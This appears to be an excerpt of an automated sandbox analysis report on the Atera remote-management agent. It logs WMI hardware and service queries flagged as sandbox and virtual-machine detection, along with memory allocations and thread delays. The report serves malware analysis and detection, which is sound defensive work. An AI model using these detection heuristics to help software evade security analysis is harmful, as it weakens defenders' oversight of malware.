                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID=&quot;\\\\.\\PHYSICALDRIVE0&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent=&quot;Win32_DiskDrive.DeviceID=\&quot;\\\\\\\\.\\\\PHYSICALDRIVE0\&quot;&quot;
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
                                Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
                                Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 16E73BC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 16E75650000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 2BEFA9D0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 2BEFB1A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 167D1680000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 167E9D50000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 280BAB90000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 280D3110000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 12CAF220000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 12CC7A20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 21B51E00000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 21B69FF0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 125CB650000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 125E3D10000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 15421260000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 154395C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 1D7227F0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 1D73AEF0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 215A9040000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 215C1580000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 1AF6AEC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 1AF6B5A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 235A19B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 235B9AC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeMemory allocated: 277DF610000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeMemory allocated: 277F7DA0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeMemory allocated: 1FC47930000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeMemory allocated: 1FC5FF60000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMemory allocated: 1AA4B1B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMemory allocated: 1AA638F0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMemory allocated: 2C38B7C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMemory allocated: 2C3A3D70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599765
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599655
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599327
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599218
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599099
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598755
